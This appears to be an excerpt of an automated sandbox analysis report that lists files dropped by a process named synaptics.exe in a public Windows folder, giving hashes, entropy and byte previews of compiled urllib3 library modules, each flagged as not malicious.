                                                                                                                                                                                                                                  Preview:o.......=..f.C.......................@...s:...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.r5d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d.g.Z.e...d...Z.e...d...Z.e...d...Z.e.j.d.e.j.e.e.f...e.j.e.j.e.e.f.....d.f...Z.G.d.d...d.e...Z.d.d.d...Z.G.d.d...d.e.j.e.e.f...e.j.e.e.f.....Z.G.d.d...d.e.j.e.j.e.e.f.......Z G.d.d...d.e.j.e.e.f.....Z!d.S.)......)...annotationsN)...OrderedDict)...Enum..auto)...RLock)...Protocol)...Selfc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...HasGettableStringKeys..return..typing.Iterator[str]c....................C........d.S...N......selfr....r.....DC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\_collections.py..keys...........z.HasGettableStringKeys.keys..key..strc....................C...r....r....r......r....r....r....r....r......__getitem__....r....z!HasGettableStringKeys.__getitem__N..r....r......r....r....r....r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r......Recent
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9076
                                                                                                                                                                                                                                  Entropy (8bit):5.2555826419306895
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:zR6oSXCyBq9B8lhwzOcRtKtABQS0Sr6Ma/:d6oenq9H6cRTBB0Sr6Ma/
                                                                                                                                                                                                                                  MD5:236776F33E40CA7030B5D2C6C41AF51B
                                                                                                                                                                                                                                  SHA1:C00A4803C1C300AB8B21D4BE87CFD5445563CBC0
                                                                                                                                                                                                                                  SHA-256:285C8C778DD2DDF5F07555CCF6A4CC08F2050917C07DA94945DB72F59F59A8DC
                                                                                                                                                                                                                                  SHA-512:6F128A16A860E3B5FAFE1CD30D1C003B65D6393F9D095C97B59FE09F6923FC8F2CF4959C25A349F5C3500679B245C0F07448B35A7B0C3FDA81E78E56E819604B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.&.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.g.Z.e.j.e.j.e.j.e.e.j.e.e.f...f.....e.j.e.e.j.e.e.f...f...f...Z.G.d.d...d...Z.d.S.)......)...annotationsN)...urlencode.....)..._TYPE_BODY)...HTTPHeaderDict)..._TYPE_FIELDS..encode_multipart_formdata)...BaseHTTPResponse..RequestMethodsc....................@...sp...e.Z.d.Z.d.Z.h.d...Z.d%d&d.d...Z.........d'd(d.d...Z.........d)d*d.d...Z.....d+d,d!d"..Z.........d'd-d#d$..Z.d.S.).r....a..... Convenience mixin for classes who implement a :meth:`urlopen` method, such. as :class:`urllib3.HTTPConnectionPool` and. :class:`urllib3.PoolManager`... Provides behavior for making common types of HTTP request methods and. decides which type of request field encoding to use... Specifically,.. :meth:`.request_encode_url` is for sending requests whose fields are. encoded in the URL (such as GET, HEAD, DELETE)... :meth:`.request_encode_body`
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):480
                                                                                                                                                                                                                                  Entropy (8bit):5.366450835666649
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:y/CvlYN5ltyLSbBjz/8Ck4w3u5r3PyNAQ9AFtHzFAGhRvsx2c6m87lE/2f+uaHK6:CuKjR85Yr3auej47+uzniZ8I4srEkJ
                                                                                                                                                                                                                                  MD5:8EEE30E1172012408DFB5C0637A75D2D
                                                                                                                                                                                                                                  SHA1:A96F929A768D4945A269C2032041194596D562D9
                                                                                                                                                                                                                                  SHA-256:DB19FECEE775D86D450499B1418D8198D4A42BA6FE9F80489A27A54CE11AD8DD
                                                                                                                                                                                                                                  SHA-512:563E004F6D4CC006ECB66E6AB9C71C4E71FA870D95AB207DB6458AF1DE7F84DE0F198B4DAFA2C8DCE1F41E77A6900CAA4BA25D3C164DB466B9CA8F9D29122013
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...sh...U.d.Z.e.r.d.d.l.m.Z.m.Z...e.e.e.e.f...d.f...Z.n.e.Z.e.e.d.<.e.e.d.<.e.e.d.<.e.e.d.<.d...Z.Z.d...Z.Z.d.S.).F.....)...Tuple..Union...version..__version__..__version_tuple__..version_tuplez.2.2.3)......r.........N)...TYPE_CHECKING..typingr....r......int..strZ.VERSION_TUPLE..object..__annotations__r....r....r....r......r....r.....@C:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\_version.py..<module>....s..........................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24009
                                                                                                                                                                                                                                  Entropy (8bit):5.540549002359107
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:j3oyv1iEkiRj91RsJ0YTnenrRaBVIT7sgTbzXugzTBDERk4VypKsFVc56AnzeuqG:j3owrjRsJ0YTG6I8gniiJqYpn6QesG
                                                                                                                                                                                                                                  MD5:E69AE0BEE62F0F187BBDD3C88E780510
                                                                                                                                                                                                                                  SHA1:84C29FDE97170617EEBF31B5E622AF3C81578497
                                                                                                                                                                                                                                  SHA-256:8031817481555660194F71E6D5B9320BDAB79B005AA267C1331AC52DB5CA95B8
                                                                                                                                                                                                                                  SHA-512:DBB35D52016A14861AA6D7AADF0388C19587BB534E8714DF2D0BBB6E48A39C9645575A8827E6217DD32DEF64310C5FCC1FF9972BA8DF10DF70FA9EE05BB17E21
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..fT........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r[d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..z.d.d.l)Z)e)j*Z+W.n...e,e-f.y.......d.Z)G.d.d...d.e...Z+Y.n.w.d.d.l/m0Z0..d.d.l/m1Z1..d.d.l/m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?m@Z@..d.d.lAmBZB..d.d.l.mCZD..d.d.l.mEZEmFZFmGZGmHZHmIZI..d.d.lJmKZKmLZL..d.d.lMmNZN..eOZOePZPe..QeR..ZSd.d.d ..ZTe..Ud!d"d...ZVe..Wd#..ZXeYe.d$..ZZG.d%d&..d&e...Z.G.d'd(..d(e...Z[G.d)d*..d*e.j\..Z]d+d,..d_dFdG..Z^.+d`dadNdO..Z_dbdTdU..Z`dcdVdW..ZaG.dXdY..dY..Zbe)..s[ebZ[e[Zc..ddded]d^..Zdd.S.)f.....)...annotationsN)...HTTPConnection)...HTTPException)...ResponseNotReady....timeout.........HTTPResponse)..._TYPE_PEER_CERT_RET_DICT)...SSLTransport)...HTTPHeaderDict)...probe)...assert_header_parsing)..._DEFAULT_TIMEOUT.._TYPE_TIME
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29197
                                                                                                                                                                                                                                  Entropy (8bit):5.4403174158724825
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:mi2l13Jti2pYtq6fBiKrzYIpKneR4TliLX1XkFCDD2rz8vIkwjYHklf8HvpnykHN:VaQ22tqUBi9eOTlfavNyke9aR
                                                                                                                                                                                                                                  MD5:D77AD1F00B6C64BA035E3CCC77669ABA
                                                                                                                                                                                                                                  SHA1:93B4CBB8D2A0860F82B8433C59D02B5D98A13024
                                                                                                                                                                                                                                  SHA-256:658676F96B14499148B4EC7AD348DB01BC90BF6F9A532A70FF97F9CF4CA4B695
                                                                                                                                                                                                                                  SHA-512:D73C75947587CEB1048FB0BE81E28B06C6AA5F53E5A5CA5B3A86D5ECA238B5C83B6A753F71C64522B4AB87002916F6EFF9AD7ACE69A92A7341C70365AD886F7C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...sV...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<..d.d.l=m>Z>m?Z?..d.d.l=m@ZA..d.d.l=mBZB..d.d.lCmDZD..e.jEr.d.d.lFZFd.d.lGmHZH..d.d.l.mIZImJZJ..e..KeL..ZMe.jNe<eOe;d.f...ZPG.d.d...d...ZQe.jRe.jSh.ZTG.d.d...d.eQe...ZUG.d.d...d.eU..ZVd6d$d%..ZWe.jXd7d*d+....Z@e.jXd8d,d+....Z@d9d-d+..Z@..d:d;d1d2..ZYd<d4d5..ZZd.S.)=.....)...annotationsN....timeout)...TracebackType.....)..._TYPE_BODY)...HTTPHeaderDict)...RequestMethods)...BaseSSLError..BrokenPipeError..DummyConnection..HTTPConnection..HTTPException..HTTPSConnection..ProxyConfig.._wrap_proxy_error)...port_by_scheme)...ClosedPoolError..EmptyPoolError..FullPoolError..HostChangedError..InsecureRequestWarning..Location
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13220
                                                                                                                                                                                                                                  Entropy (8bit):4.953643436634498
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:sNvd2MCSNJR3aibXrLh86mCrEl7mRkUfLL2xEZiru/cc8fditjgsS5ioCR:sxdfCSNJR3aibXrLh86frElCRvTCuUrM
                                                                                                                                                                                                                                  MD5:5A4798C9B89C1993049B94513F6066EA
                                                                                                                                                                                                                                  SHA1:45FF51D9431EB0BBA9EF635F27DF53409FB2EF07
                                                                                                                                                                                                                                  SHA-256:67301FB68B04C04F249CAC62A49FC3A4AE007400424E0ECA291A1C0377186CA4
                                                                                                                                                                                                                                  SHA-512:111E66BDB1F50336F58B0FAC53CCD66AEB254F6D6867141175CBE0C8AC628F7AA4DDE0BD5A28F6AB739E9470CDE75963ED5F3D2D6741D10827C139F40176067F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.$.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.r9d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.j.e.j.d.e.f...e.j.e.d.f...f...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z e Z!G.d.d...d.e...Z"G.d.d...d.e...Z#G.d.d ..d e...Z$G.d!d"..d"e...Z%G.d#d$..d$e%e...Z&G.d%d&..d&e%..Z'G.d'd(..d(e'e...Z(G.d)d*..d*e(..Z)G.d+d,..d,e...Z*G.d-d...d.e...Z+G.d/d0..d0e...Z,G.d1d2..d2e-e...Z.G.d3d4..d4e...Z/G.d5d6..d6e...Z0G.d7d8..d8e...Z1G.d9d:..d:e...Z2G.d;d<..d<e2..Z3G.d=d>..d>e2..Z4G.d?d@..d@e2..Z5G.dAdB..dBe2..Z6G.dCdD..dDe...Z7G.dEdF..dFe e-..Z8G.dGdH..dHe...Z9G.dIdJ..dJe.e...Z.G.dKdL..dLe.e...Z:G.dMdN..dNe...Z;G.dOdP..dPe<e0..Z=G.dQdR..dRe-..Z>G.dSdT..dTe...Z?G.dUdV..dVe...Z@d.S.)W.....)...annotationsN)...MessageDefect)...IncompleteRead.....)...HTTPConnection)...ConnectionPool)...HTTPResponse)...Retryc....................@........e.Z.d.Z.d.Z.d.S.)...HT
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9702
                                                                                                                                                                                                                                  Entropy (8bit):5.401990130217446
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:toIkPHKu22d82vhf5Ev375rL9FYAKHK0oi7:tBkPHKu22Cehf+vL5rL9FYAKHboi7
                                                                                                                                                                                                                                  MD5:D92C1ADDCA12A7F8F882F035D553D8A1
                                                                                                                                                                                                                                  SHA1:016367D0529AE23BBA3697F7380B6E2ED979FD3E
                                                                                                                                                                                                                                  SHA-256:A38BAA28416779F7DC1F6A85355C0F8E70B070886FB190D507CCECC5A917E2A1
                                                                                                                                                                                                                                  SHA-512:8139422EBC803A069B805DC7DD0D6FECE2DAC8CE77FE64DAB17D725B782AFF28F96EB6C50FE116DF270FBF59A0C4DDC53B56C50AA150DB3D25665632152F1C9C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f[*.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.e.f...Z.e.j.e.e.j.e.e.f...e.j.e.e.e.f...f...Z...d.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.G.d.d...d...Z.d.S.)......)...annotationsN..application/octet-stream..filename..str | None..default..str..returnc....................C...s....|.r.t...|...d...p.|.S.|.S.).z.. Guess the "Content-Type" of a file... :param filename:. The filename to guess the "Content-Type" of using :mod:`mimetypes`.. :param default:. If no "Content-Type" can be guessed, default to `default`.. r....)...mimetypesZ.guess_type).r....r......r.....>C:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\fields.py..guess_content_type....s..........r......name..value.._TYPE_FIELD_VALUEc........................s....d.d.l.}.|.j.d.t.d.d.....t...t...r.....d.....t...f.d.d...d.D.....s=|...d.....d...}.z.|...d.....W.|.S...t.t.f.y<......Y.n.w.t.j.....d.....|...d...........S.).a..... Helper function to format and
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                                  Entropy (8bit):5.594938067237134
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:hL1hfLSMUUyrfcuCKwlb9BEA2GS8FD5yHbVz:tLSrxc59TEA2CDUHbx
                                                                                                                                                                                                                                  MD5:159895200097B65344A98089E2D136AA
                                                                                                                                                                                                                                  SHA1:EB3916FD4C3E98C3AE54D117B97B41884A818707
                                                                                                                                                                                                                                  SHA-256:3E8CF9DA25FC1AF33649CFAB04DE73EDA5C512E4325357A64093F2AF242E3409
                                                                                                                                                                                                                                  SHA-512:FC05E5F79CC64FED0562715E16112B2B10B65A86B020E9C0767867D223CE20EE493027DDA929A868DBD065AAAD5D18EABC27CD923F427E72179848BFA3DE82BC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f[........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e...d...d...Z.e.j.e.j.e.j.e.e.f...e.f.....Z.e.j.e.e.j.e.e.f...f...Z.d.d.d...Z.d.d.d...Z...d.d.d.d...Z.d.S.)......)...annotationsN)...BytesIO.....)..._TYPE_FIELD_VALUE_TUPLE..RequestFieldz.utf-8.......return..strc....................C...s....t...t...d.........S.).zN. Our embarrassingly-simple replacement for mimetools.choose_boundary.. .....)...binascii..hexlify..os..urandom..decode..r....r.....@C:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\filepost.py..choose_boundary....s......r......fields.._TYPE_FIELDS..typing.Iterable[RequestField]c....................c...sH.....t.|.t.j...r.|.....}.n.|.}.|.D.].}.t.|.t...r.|.V...q.t.j.|...V...q.d.S.).z.. Iterate over fields... Supports list of (k, v) tuples and dicts, and lists of. :class:`~urllib3.fields.RequestField`... N)...isinstance..typing..Mapping..itemsr....Z.from_tuples).r......iterable..fieldr....r.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18188
                                                                                                                                                                                                                                  Entropy (8bit):5.4911700702495585
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+rlCIl5+Q3vw7bm2+Pp0hTZp4tGwimHF3Y:OvgQ3vwng+NZp8Bl3Y
                                                                                                                                                                                                                                  MD5:713B2FE1C46043CCAE2C6B53F42DA80B
                                                                                                                                                                                                                                  SHA1:C99FEBA86550292F42D9DE7B0B62AF5D008EBBF5
                                                                                                                                                                                                                                  SHA-256:411B026768C22A3F31F4B28DDFB936106512E9562CB6BC884C05FAA17E19FB95
                                                                                                                                                                                                                                  SHA-512:18A45DF43B9D20709C8CB0C001D49824931E42EF6223693A64BF71E8DFAB0E766CDE1ED6BBABDE5EA5A0B6281A05E6956777F28059099B2000BC6FCB9563C07D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.Y.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..e.j'r.d.d.l(Z(d.d.l)m*Z*..g.d...Z+e..,e-..Z.d.Z/d.Z0G.d.d...d.e.j1..Z2d)d.d...Z3e..4e3e2..e..4e3e2..d...Z5e.e.d...Z6G.d.d ..d e...Z7G.d!d"..d"e7..Z8d*d'd(..Z9d.S.)+.....)...annotationsN)...TracebackType)...urljoin.....)...HTTPHeaderDict..RecentlyUsedContainer)...RequestMethods)...ProxyConfig)...HTTPConnectionPool..HTTPSConnectionPool..port_by_scheme)...LocationValueError..MaxRetryError..ProxySchemeUnknown..URLSchemeUnknown)...BaseHTTPResponse)..._TYPE_SOCKET_OPTIONS)...connection_requires_http_tunnel)...Retry)...Timeout)...Url..parse_url)...Self)...PoolManager..ProxyManager..proxy_from_url)...key_file..cert_file..cert_reqs..ca_certs..ca_cert_data..ssl_version..ssl_minimum_version..ssl_maximum_version..ca_cert_dir..ss
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33450
                                                                                                                                                                                                                                  Entropy (8bit):5.334645759683884
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:OnBkshRIwAG560Mg+c3lKBgtd1xaZ38CSYJr/YV4CypM0AmwK2Kd1B+E1dz6RPrX:DGc8L1KBaPxbupCIAHK2KZiy8wUhX
                                                                                                                                                                                                                                  MD5:643ECE4467BEB4D4B17878F2C9B3207C
                                                                                                                                                                                                                                  SHA1:FB4DC920883C106F6CE3D291A2DD033C2970DF6C
                                                                                                                                                                                                                                  SHA-256:A050ED07CA8216AB651E2CDEDC83FE997F7C249650593B252874355FCE8DF675
                                                                                                                                                                                                                                  SHA-512:7F4D99051A8FC2FF9B7DB9E21D5FFF84CE8DFF5A71752E249D89910A1C43DDB72058E5A643581CDEAF8B9E04666BE0B334729861B7E989EE16F06B34C3D3EFDF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.rKd.d.l.m.Z...z.z.d.d.l.Z.W.n...e.y_......d.d.l.Z.Y.n.w.W.n...e.yl......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.e.e.f.y.......d.Z Y.n.w.e!e"e#e..$d.e.j%...&......Z'e'd.k.r.d.Z n.d.Z d.d.l(m)Z)..d.d.l.m*Z*..d.d.l+m,Z,..d.d.l-m.Z.m/Z/m0Z0..d.d.l1m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>..d.d.l?m@Z@..e.j.r.d.d.lAmBZB..e..CeD..ZEG.d.d...d...ZFG.d.d...d.eF..ZGG.d.d...d...ZHG.d.d...d.eF..ZIe.d.u...r.G.d.d...d.eF..ZJe ..r.G.d.d ..d eF..ZKG.d!d"..d"eF..ZLd.d&d'..ZMG.d(d)..d)..ZNG.d*d+..d+e.jO..ZPG.d,d-..d-eP..Z.d.S.)/.....)...annotationsN)...contextmanager)...HTTPMessage)...HTTPResponse)...timeout.....)...BaseHTTPConnectionFz.^([0-9]+)\.([0-9]+)).r.........T)...util)..._TYPE_BODY)...HTTPHeaderDict)...BaseSSLError..HTTPConnection..HTTPException)...BodyNotHttplibCompatible..DecodeError..HTTPError..IncompleteRead..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):165
                                                                                                                                                                                                                                  Entropy (8bit):4.55427522760354
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:y/C8llGllluleh/wZWet5OaHF5oXu5E5DVWrzOXH+IOkcTgp:y/C8lcl/qeh/whIaHKdAr6XeR4
                                                                                                                                                                                                                                  MD5:AD7689A7AA96703BAAA63637D9526625
                                                                                                                                                                                                                                  SHA1:9E4AE068A29B0213DF7A3CAEE73CCDFD4B877C4A
                                                                                                                                                                                                                                  SHA-256:E4F505BF76CB628E532CBE2BFAC533CC7959712DD9EAB249A936E5C5ADB398CF
                                                                                                                                                                                                                                  SHA-512:5D15A862C3B2E1D14B815101FC67E4B0EEBD6D22616FF7938E9FB06611CF3CB8AE77C1511619FBA13AAC0E68A5AC2AC4864A7B9596A507DF5B4270BF2BE8CAE3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...s....d.S.).N..r....r....r.....HC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\contrib\__init__.py..<module>....s......
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6126
                                                                                                                                                                                                                                  Entropy (8bit):5.637119256134298
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:7q8bFojUEqiHSz8wKWZMs7hTbWiTmC69iE245Zi81JQ3:W6VEqtMGbC9ipca3
                                                                                                                                                                                                                                  MD5:0DED9A7C5F037BA15A9FBCD1C1F9EB34
                                                                                                                                                                                                                                  SHA1:C803F157BD4D15F5C1FD23F5EA2FE12BC0B86480
                                                                                                                                                                                                                                  SHA-256:45E680BCF63B07E6BEEDF03BED483C704242F9EE7C38BFEE425BA7C973852658
                                                                                                                                                                                                                                  SHA-512:A413D897478E835A30D1A7ABFC3FA40F60B407FBC467561051102C42D9CF2FF511C1E0AE667EC9BA4E145D76F8714D0EAD2E9B2C5191102CC2A997DEC396DFB6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f}........................@...s6...d.Z.d.d.l.m.Z...z.d.d.l.Z.W.n...e.y&......d.d.l.Z.d.d.l.m.Z...e...d.e.......w.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.yf......d.Z.Y.n.w.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z d.S.).a.....This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recom
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1402
                                                                                                                                                                                                                                  Entropy (8bit):5.396954782931843
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:LMu6QKYYYH7N9QU4DMU3KZsGfM3yRiR7FynW92vbwFWHrb49msQWP7:ABdYLbX4DinRayzD9Hrb4mAP7
                                                                                                                                                                                                                                  MD5:A89A83D4C6249249683B57E13B46511F
                                                                                                                                                                                                                                  SHA1:1C5EE83A8C001C02D625A589448C0E7A1C0ECDAA
                                                                                                                                                                                                                                  SHA-256:055C794082ACD8D194F043C0876B7C4D03AE0A332E2EA5465BE9C9592D528B01
                                                                                                                                                                                                                                  SHA-512:13302D3E96910D8FCAAA17537C2B43F9D08A70356FB0DA202454569215CE8B41907ADA34E1CA49D21AD937B6A26EB942E3A77A14C3E5FC8E1C9BCC03BEBBDE5D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...sN...U.d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.l.Z.d.a.d.e.d.<.d.d.d...Z.d.d.d...Z.d.S.)......)...annotations)...version..inject_into_urllib3..extract_from_urllib3Nz.typing.Any..orig_HTTPSConnection..return..Nonec....................C...s....t.d...}.|...d...s.t.d.|...d.......d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...|.j.a.|.|._.|.|._.d.g.|._.d.g.|._.d.S.).N..h2z.4.zQurllib3 v2 supports h2 version 4.x.x, currently the 'h2' module is compiled with z5. See: https://github.com/urllib3/urllib3/issues/3290.........connection....util....HTTPSConnectionPool....ssl_.....)...HTTP2Connection).r......startswith..ImportError..r....r......connectionpoolr....r....r......HTTPSConnectionr......ConnectionCls..ALPN_PROTOCOLS).Z.h2_version..urllib3_connection..urllib3_utilr......urllib3_util_sslr......r.....FC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\http2\__init__.pyr........s".....................................c....................C...sP
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2536
                                                                                                                                                                                                                                  Entropy (8bit):5.257063032313745
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:kPQG3rPc+qRTB08DGmDZrZCYawGQ2bcwf27jpWsI663cv6iuJh6+:kzK/DGmDZEYaw4bbujpXkSNok+
                                                                                                                                                                                                                                  MD5:9FFC6A70A7F7A4330339DA37A36DEB94
                                                                                                                                                                                                                                  SHA1:D4432234CB9C2E641541B995CDB3F400DE27AEF4
                                                                                                                                                                                                                                  SHA-256:5D7F726F1F0D238C9486EB16C39D984B7BED243DCE8B316B58B777545B27569C
                                                                                                                                                                                                                                  SHA-512:4BEF2B3F598CDEEC47535D68A4A636BE8E294E1777EE4D30EBCF6D7BCFBFDBDC66451677BA1AB65409E4D8F5A85F2BDC4A91B30E58A3D39E4C84103B713B6366
                                                                                                                                                                                                                                  Malicious:false
